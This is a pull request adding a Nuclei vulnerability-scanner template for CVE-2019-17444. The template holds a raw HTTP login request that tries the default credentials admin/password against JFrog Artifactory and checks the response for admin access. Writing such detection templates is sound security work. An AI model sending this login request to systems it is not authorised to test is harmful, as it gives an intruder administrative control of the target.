### PR TITLE
Added CVE-2019-17444 (Jfrog Artifactory default password)

### DIFF
--- a/cves/2019/CVE-2019-17444.yaml
+++ b/cves/2019/CVE-2019-17444.yaml
@@ -20,7 +20,7 @@ info:
 requests:
   - raw:
       - |
-        POST /ui/api/v1/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
+        POST /ui/api/v1/ui/auth/login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json;charset=UTF-8
         X-Requested-With: XMLHttpRequest

--- a/cves/2019/CVE-2019-17444.yaml
+++ b/cves/2019/CVE-2019-17444.yaml
@@ -1,0 +1,42 @@
+id: CVE-2019-17444
+
+info:
+  author: pdteam
+  name: Jfrog Artifactory default password
+  severity: critical
+  description: |
+    Jfrog Artifactory uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. This issue affects Jfrog Artifactory versions prior to 6.17.0.
+  reference:
+    - https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes
+    - https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-17444
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2019-17444
+    cwe-id: CWE-521
+  tags: cve,cve2019,jfrog,default-login
+
+requests:
+  - raw:
+      - |
+        POST /ui/api/v1/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json;charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        Origin: {{RootURL}}
+
+        {"user":"admin","password":"password","type":"login"}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '"name":"admin"'
+          - '"admin":true'
+        condition: and


### PR DESCRIPTION
### Template Validation

https://twitter.com/GodfatherOrwa/status/1514746026548248585

I've validated this template locally?
- [x] YES
- [ ] NO

```console
[2022-04-15 13:15:59] [CVE-2019-17444] [http] [critical] http://redacted/ui/api/v1/ui/auth/login
```


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)